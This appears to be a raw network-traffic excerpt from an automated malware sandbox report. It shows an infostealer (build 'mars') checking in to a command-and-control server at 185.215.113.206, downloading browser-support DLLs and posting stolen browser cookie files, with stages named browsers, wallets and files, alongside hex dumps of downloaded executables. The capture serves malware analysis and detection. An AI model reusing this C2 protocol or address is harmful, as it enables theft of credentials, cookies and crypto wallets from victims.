04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 25 Nov 2024 23:25:55 GMTContent-Type: application/octet-streamContent-Length: 1951744Last-Modified: Mon, 25 Nov 2024 23:19:44 GMTConnection: keep-aliveETag: "67450610-1dc800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 30 4d 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 4d 00 00 04 00 00 84 37 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 1b 4d 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 1b 4d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2b 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 6d 67 6f 63 6a 63 74 00 b0 1a 00 00 70 32 00 00 ac 1a 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 68 62 65 74 7a 66 66 00 10 00 00 00 20 4d 00 00 04 00 00 00 a2 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 4d 00 00 22 00 00 00 a6 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 25 Nov 2024 23:27:10 GMTContent-Type: application/octet-streamContent-Length: 4375040Last-Modified: Mon, 25 Nov 2024 21:29:06 GMTConnection: keep-aliveETag: "6744ec22-42c200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e9 85 3c 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 fc 49 00 00 96 73 00 00 32 00 00 00 40 c4 00 00 10 00 00 00 10 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 70 c4 00 00 04 00 00 da f8 42 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 00 71 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 2f c4 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 2f c4 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 e0 70 00 00 10 00 00 00 78 27 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 f0 70 00 00 00 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 00 71 00 00 02 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 38 00 00 10 71 00 00 02 00 00 00 8a 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 67 72 63 71 65 75 6d 00 10 1b 00 00 20 a9 00 00 10 1b 00 00 8c 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6c 67 76 66 61 61 64 00 10 00 00 00 30 c4 00 00 04 00 00 00 9c 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 c4 00 00 22 00 00 00 a0 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAKHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 41 41 36 45 42 43 30 30 43 33 31 32 39 31 33 31 31 31 33 31 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 2d 2d 0d 0a Data Ascii: ------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="hwid"37AA6EBC00C31291311131------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="build"mars------GDAAKFIDGIEGDGDHIDAK--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFBFCBGHDGCFHJJECAFHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 37 35 65 30 35 38 32 36 39 66 63 34 37 35 30 30 34 33 36 38 39 36 31 64 65 66 66 39 63 36 34 39 35 34 37 66 39 34 37 35 34 31 63 33 37 39 66 34 62 62 32 62 63 61 61 35 62 31 30 38 33 35 34 39 33 39 30 65 34 66 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 2d 2d 0d 0a Data Ascii: ------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="token"4675e058269fc475004368961deff9c649547f947541c379f4bb2bcaa5b1083549390e4f------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="message"browsers------BAFBFCBGHDGCFHJJECAF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIJKJJKEBGHJKFIDGCAHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 37 35 65 30 35 38 32 36 39 66 63 34 37 35 30 30 34 33 36 38 39 36 31 64 65 66 66 39 63 36 34 39 35 34 37 66 39 34 37 35 34 31 63 33 37 39 66 34 62 62 32 62 63 61 61 35 62 31 30 38 33 35 34 39 33 39 30 65 34 66 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 2d 2d 0d 0a Data Ascii: ------CGIJKJJKEBGHJKFIDGCAContent-Disposition: form-data; name="token"4675e058269fc475004368961deff9c649547f947541c379f4bb2bcaa5b1083549390e4f------CGIJKJJKEBGHJKFIDGCAContent-Disposition: form-data; name="message"plugins------CGIJKJJKEBGHJKFIDGCA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIJKEBFBFHIJJKEHDHIHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 4a 4b 45 42 46 42 46 48 49 4a 4a 4b 45 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 37 35 65 30 35 38 32 36 39 66 63 34 37 35 30 30 34 33 36 38 39 36 31 64 65 66 66 39 63 36 34 39 35 34 37 66 39 34 37 35 34 31 63 33 37 39 66 34 62 62 32 62 63 61 61 35 62 31 30 38 33 35 34 39 33 39 30 65 34 66 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 4b 45 42 46 42 46 48 49 4a 4a 4b 45 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 4b 45 42 46 42 46 48 49 4a 4a 4b 45 48 44 48 49 2d 2d 0d 0a Data Ascii: ------BFIJKEBFBFHIJJKEHDHIContent-Disposition: form-data; name="token"4675e058269fc475004368961deff9c649547f947541c379f4bb2bcaa5b1083549390e4f------BFIJKEBFBFHIJJKEHDHIContent-Disposition: form-data; name="message"fplugins------BFIJKEBFBFHIJJKEHDHI--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGIEGCFHCFHIDHIJECAHost: 185.215.113.206Content-Length: 6315Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIJDHIDBGHJKECBFIIDHost: 185.215.113.206Content-Length: 427Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 37 35 65 30 35 38 32 36 39 66 63 34 37 35 30 30 34 33 36 38 39 36 31 64 65 66 66 39 63 36 34 39 35 34 37 66 39 34 37 35 34 31 63 33 37 39 66 34 62 62 32 62 63 61 61 35 62 31 30 38 33 35 34 39 33 39 30 65 34 66 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 2d 2d 0d 0a Data Ascii: ------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="token"4675e058269fc475004368961deff9c649547f947541c379f4bb2bcaa5b1083549390e4f------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------DHIJDHIDBGHJKECBFIID--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJEGCGDGHDHIDHDGCBHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 4a 45 47 43 47 44 47 48 44 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 37 35 65 30 35 38 32 36 39 66 63 34 37 35 30 30 34 33 36 38 39 36 31 64 65 66 66 39 63 36 34 39 35 34 37 66 39 34 37 35 34 31 63 33 37 39 66 34 62 62 32 62 63 61 61 35 62 31 30 38 33 35 34 39 33 39 30 65 34 66 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 45 47 43 47 44 47 48 44 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 45 47 43 47 44 47 48 44 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 45 47 43 47 44 47 48 44 48 49 44 48 44 47 43 42 2d 2d 0d 0a Data Ascii: ------BGIJEGCGDGHDHIDHDGCBContent-Disposition: form-data; name="token"4675e058269fc475004368961deff9c649547f947541c379f4bb2bcaa5b1083549390e4f------BGIJEGCGDGHDHIDHDGCBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BGIJEGCGDGHDHIDHDGCBContent-Disposition: form-data; name="file"------BGIJEGCGDGHDHIDHDGCB--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAFHost: 185.215.113.206Content-Length: 3087Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFHIIEHIEGDHJJJKFIIHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 37 35 65 30 35 38 32 36 39 66 63 34 37 35 30 30 34 33 36 38 39 36 31 64 65 66 66 39 63 36 34 39 35 34 37 66 39 34 37 35 34 31 63 33 37 39 66 34 62 62 32 62 63 61 61 35 62 31 30 38 33 35 34 39 33 39 30 65 34 66 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 2d 2d 0d 0a Data Ascii: ------JKFHIIEHIEGDHJJJKFIIContent-Disposition: form-data; name="token"4675e058269fc475004368961deff9c649547f947541c379f4bb2bcaa5b1083549390e4f------JKFHIIEHIEGDHJJJKFIIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JKFHIIEHIEGDHJJJKFIIContent-Disposition: form-data; name="file"------JKFHIIEHIEGDHJJJKFII--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGCBKKJDHJJJKECGIIIHost: 185.215.113.206Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKFCGHIDHCBGDHJKEBHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 37 35 65 30 35 38 32 36 39 66 63 34 37 35 30 30 34 33 36 38 39 36 31 64 65 66 66 39 63 36 34 39 35 34 37 66 39 34 37 35 34 31 63 33 37 39 66 34 62 62 32 62 63 61 61 35 62 31 30 38 33 35 34 39 33 39 30 65 34 66 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 2d 2d 0d 0a Data Ascii: ------EHJKFCGHIDHCBGDHJKEBContent-Disposition: form-data; name="token"4675e058269fc475004368961deff9c649547f947541c379f4bb2bcaa5b1083549390e4f------EHJKFCGHIDHCBGDHJKEBContent-Disposition: form-data; name="message"wallets------EHJKFCGHIDHCBGDHJKEB--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKJEGCFBGDHJJJJJKJEHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 37 35 65 30 35 38 32 36 39 66 63 34 37 35 30 30 34 33 36 38 39 36 31 64 65 66 66 39 63 36 34 39 35 34 37 66 39 34 37 35 34 31 63 33 37 39 66 34 62 62 32 62 63 61 61 35 62 31 30 38 33 35 34 39 33 39 30 65 34 66 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 2d 2d 0d 0a Data Ascii: ------AAKJEGCFBGDHJJJJJKJEContent-Disposition: form-data; name="token"4675e058269fc475004368961deff9c649547f947541c379f4bb2bcaa5b1083549390e4f------AAKJEGCFBGDHJJJJJKJEContent-Disposition: form-data; name="message"files------AAKJEGCFBGDHJJJJJKJE--
